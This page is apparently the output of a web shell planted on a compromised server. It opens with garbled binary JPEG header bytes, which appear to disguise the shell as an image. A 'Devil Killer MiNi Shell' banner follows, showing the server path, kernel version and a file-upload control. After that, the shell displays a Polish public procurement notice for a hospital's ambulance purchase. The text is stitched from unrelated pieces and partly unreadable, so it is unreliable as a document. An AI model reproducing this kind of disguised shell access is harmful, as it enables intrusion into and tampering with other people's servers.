JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210505/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210505/0004668004-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00046680 z dnia 2021-05-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup ambulansu drogowego typu C wraz z wyposażeniem dla zespołów ratownictwa medycznego Zespołu Opieki Zdrowotnej w Lidzbarku Warmińskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Opieki Zdrowotnej w Lidzbarku Warmińskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000308459</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kardynała Stefana Wyszyńskiego 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lidzbark Warmiński</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(89) 767 75 10</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(89) 767 29 66</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@zozlw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zozlw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zakład Opieki Zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup ambulansu drogowego typu C wraz z wyposażeniem dla zespołów ratownictwa medycznego Zespołu Opieki Zdrowotnej w Lidzbarku Warmińskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8413d385-acb2-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00046680</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">04</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00023638/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup ambulansu drogowego typu C wraz z wyposażeniem dla zespołów ratownictwa medycznego Zespołu Opieki Zdrowotnej w Lidzbarku Warmińskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn. „Zakup ambulansu oraz środków ochrony indywidualnej w celu zwiększenia skuteczności zapobiegania, przeciwdziałania i zwalczania COVID-19 oraz innych chorób zakaźnych” nr POIS.09.01.00-00-0414/21 w ramach działania 9.1 Infrastruktura ratownictwa medycznego oś priorytetowa IX Wzmocnienie strategicznej infrastruktury ochrony zdrowia POIS 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zozlw.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami będzie odbywać się przy użyciu środków komunikacji elektronicznej za pośrednictwem miniPortalu, ePUAP-u oraz pocztyelektronicznej (nie dotyczy składania, zmiany, wycofania oferty). Adres strony prowadzonego postępowania: www.zozlw.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Rejestracja i korzystanie z ePUAP-u jest bezpłatne. Wykonawca posiadający konto na ePUAP ma dostęp do: - formularza złożenia, zmiany, wycofania oferty lub wniosku oraz - formularza do komunikacji. 2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu systemu miniPortalu oraz ePUAP opisane zostały odpowiednio w Regulaminie korzystania z systemu miniPortal, dostępnym na stronie: (https://miniportal.uzp.gov.pl/WarunkiUslugi) oraz w Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP) dostępnych na stronie (https://epuap.gov.pl/wps/portal/strefaklienta/regulamin). 3. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w szczególności w: - rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentówelektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U z 2020 r., poz. 2452) oraz - rozporządzeniu Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r., poz.2415). 4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.5. Zamawiający rekomenduje w szczególności następujące formaty przesyłanych danych: .pdf, .doc, .docx, .odt..xls,.rtf. 6. Zamawiający wymaga aby dokumenty składane były w formie elektronicznej lub w postaci elektronicznej opatrzonej:- podpisem zaufanym, o którym mowa w ustawie z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz. 346, z późn. zm.) lub - podpisem osobistym, o którym mowa w ustawie z dnia z dnia 6 sierpnia 2010r. o dowodach osobistych (Dz. U. z 2020 r. poz. 332, z późn. zm. ). - pod pojęciem formy elektronicznej rozumie się dokument (elektroniczny bądź skan) opatrzony kwalifikowanym podpisem elektronicznym. - pod pojęciem postaci elektronicznej rozumie się dokument (elektroniczny bądź skan) opatrzony podpisem zaufanym (e-Puap) bądź osobistym (przy użyciu e-dowodu).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">nie dotyczy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o przetwarzaniu danych osobowych została zawarta w załączniku nr 8 do SWZ pn. Obowiązek informacyjny dot. przetwarzania danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOZ.V-260-23/ZP/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup ambulansu drogowego typu C wraz z wyposażeniem dla zespołów ratownictwa medycznego Zespołu Opieki Zdrowotnej w Lidzbarku Warmińskim. 2. Szczegółowy opis przedmiotu zamówienia został określony w Tabeli Nr 1 pn.: „Opis przedmiotu zamówienia- wymagania” stanowiącej załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34114100-0 - Pojazdy pogotowia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33100000-1 - Urządzenia medyczne</p> <p class="mb-0">34114110-3 - Pojazdy ratownicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został określony w rozdziale XVI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne oferowanego ambulansu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji serwisu gwarancyjnego pojazdu skompletowanego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: 1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa szczególnych warunków udziału w postępowaniu. 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa szczególnych warunków udziału w postępowaniu. 3) sytuacji ekonomicznej lub finansowej - Zamawiający nie określa szczególnych warunków udziału w postępowaniu. 4) zdolności technicznej lub zawodowej - Zamawiający wymaga od Wykonawcy wykazania się wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwóch dostaw ambulansów drogowych typu C wraz z wyposażeniem o wartości brutto nie mniejszej niż 350.000 zł. każdy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie niepodlegania wykluczeniu Zamawiający wymaga złożenia:odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy pzp, sporządzonych nie wcześniej niż 3 miesiące przed ich złożeniem. Zamawiający zastosuje art. 274 ust 4 ustawy pzp odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na potwierdzenie spełnienia warunków udziału w postępowaniuZamawiający wymaga złożenia: wykazu wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwóch dostaw ambulansów drogowych typu C wraz z wyposażeniem o wartości brutto nie mniejszej niż 350.000 zł. każdy, wraz z załączeniem dowodów, że dostawy te zostały wykonane należycie. Wykaz wykonanych dostaw stanowi załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia zgodności oferowanych dostaw (oferowanego przedmiotu zmówienia) z wymaganiami określonymi w dokumentacji zamówienia, w szczególności: „Opisie przedmiotu zamówienia - wymagania” Zamawiający żąda złożenia wraz z ofertą : 1. katalogu /folderu/ innego materiału informacyjnego producenta (w języku polskim) zawierających	opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie wymagań Zamawiającego.Dotyczy: ambulansu drogowego, zabudowy przedziału medycznego, zestawu transportowego, krzesła kardiologicznego, noszy płachtowych, termometru, reduktora butlowego z przepływomierzem i szybkozłączką AGA 2.Certyfikatu zgodności z normą PN-EN 1865-3:2012+A1:2015 wystawionego przez niezależną jednostkę notyfikacyjną (dotyczy wymogu określonego w pkt. 1.16 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ). 3 Certyfikatu zgodności z z normą EN-597-1 wystawionego przez niezależną jednostkę notyfikacyjną (dotyczy wymogu określonego w pkt. 1.20 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ).4. Certyfikatu zgodności z normą IEC 60601-1 wystawionego przez niezależną jednostkę notyfikacyjną (dotyczy wymogu określonego w pkt. 1.30 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ). 5.	Certyfikatów zgodności z normami PN EN 1865-3:2012+A1:2015; PN EN 1865-2:2010 +A1:2015; PN EN 1789:2007+A2:2014 wystawionymi przez niezależne jednostki notyfikacyjne (dotyczy wymogu określonego w pkt. 1.32 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ) 6. Certyfikatów zgodności z normami PN EN 1865-5:2012; PN EN 1789 wystawionymi przez niezależne jednostki notyfikacyjne (dotyczy wymogu określonego w pkt. 1.33 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ). 7. deklaracji zgodności oferowanego wyposażenia medycznego. Dotyczy: zestawu transportowego, krzesła kardiologicznego, noszy płachtowych, termometru, reduktora butlowego z przepływomierzem i szybkozłączką AGA .8	oświadczenia Wykonawcy, że zaoferowane wyposażenie (wyroby) medyczne jest dopuszczone do obrotu i stosowania na terenie Rzeczpospolitej Polskiej, zgodnie z obowiązującymi przepisami 9. oświadczenie Wykonawcy potwierdzające spełnienie wymagań Zamawiającego określonych w Tabeli nr 1 Opis przedmiotu zamówienia – wymagania, w przypadku, gdy nie wszystkie wymagane parametry będą wyszczególnione w katalogach, folderach lub innych materiałach informacyjnych producenta zaoferowanego produktu. W Oświadczeniu należy wymienić parametr (wymóg) lub jego część, który nie został potwierdzony w złożonych do oferty katalogach, folderach, innych materiałach informacyjnych producenta, wpisać rozdział, liczbę porządkową parametru (wymogu) z Tabeli ,, Opis przedmiotu zamówienia- wymagania”, którego dotyczy oraz oświadczyć, że parametr jest spełniony. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1 katalog /folder/ inny materiału informacyjnego producenta (w języku polskim) zawierających opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie wymagań Zamawiającego. Dotyczy: ambulansu drogowego, zabudowy przedziału medycznego, zestawu transportowego, krzesła kardiologicznego, noszy płachtowych, termometru, reduktora butlowego z przepływomierzem i szybkozłączką AGA 2. Certyfikat zgodności z normą PN-EN 1865-3:2012+A1:2015 wystawiony przez niezależną jednostkę notyfikacyjną (dotyczy wymogu określonego w pkt. 1.16 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ). 3. Certyfikat zgodności z z normą EN-597-1 wystawiony przez niezależną jednostkę notyfikacyjną (dotyczy wymogu określonego w pkt. 1.20 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ). 4. Certyfikat zgodności z normą IEC 60601-1 wystawiony przez niezależną jednostkę notyfikacyjną (dotyczy wymogu określonego w pkt. 1.30 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ).5. Certyfikaty zgodności z normami PN EN 1865-3:2012+A1:2015; PN EN 1865-2:2010 +A1:2015; PN EN 1789:2007+A2:2014 wystawione przez niezależne jednostki notyfikacyjne (dotyczy wymogu określonego w pkt. 1.32 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ). 6. Certyfikaty zgodności z normami PN EN 1865-5:2012; PN EN 1789 wystawione przez niezależne jednostki notyfikacyjne (dotyczy wymogu określonego w pkt. 1.33 rozdz. IX Sprzęt medyczny -zał. nr 1 do SWZ). 7.	deklaracja zgodności oferowanego wyposażenia medycznego. Dotyczy: zestawu transportowego, krzesła kardiologicznego, noszy płachtowych, termometru, reduktora butlowego z przepływomierzem i szybkozłączką AGA. 8. oświadczenie Wykonawcy, że zaoferowane wyposażenie (wyroby) medyczne jest dopuszczone do obrotu i stosowania na terenie Rzeczpospolitej Polskiej, zgodnie z obowiązującymi przepisami. 9. oświadczenie Wykonawcy potwierdzające spełnienie wymagań Zamawiającego określonych w Tabeli nr 1 Opis przedmiotu zamówienia – wymagania, w przypadku, gdy nie wszystkie wymagane parametry będą wyszczególnione w katalogach, folderach lub innych materiałach informacyjnych producenta zaoferowanego produktu. W Oświadczeniu należy wymienić parametr (wymóg) lub jego część, który nie został potwierdzony w złożonych do oferty katalogach, folderach, innych materiałach informacyjnych producenta, wpisać rozdział, liczbę porządkową parametru (wymogu) z Tabeli ,, Opis przedmiotu zamówienia- wymagania”, którego dotyczy oraz oświadczyć, że parametr jest spełniony. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający określa szczególny, obiektywnie uzasadniony, sposób spełniania przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu, mając na uwadze, że jest to uzasadnione charakterem zamówienia i jest proporcjonalne: przynajmniej jeden z wykonawców występujących wspólnie winien spełnić warunek określony w rozdziale VII ust.1 pkt. 4 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian do umowy oraz warunki ich wprowadzania zawarte zostały w Projektu umowy stanowiącym załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-21 14:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany lub wycofania oferty dostępnego na platformie ePUAP i udostępnionego również na miniPortalu, wybierając skrzynkę podawczą ePUAP Zamawiającego.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span 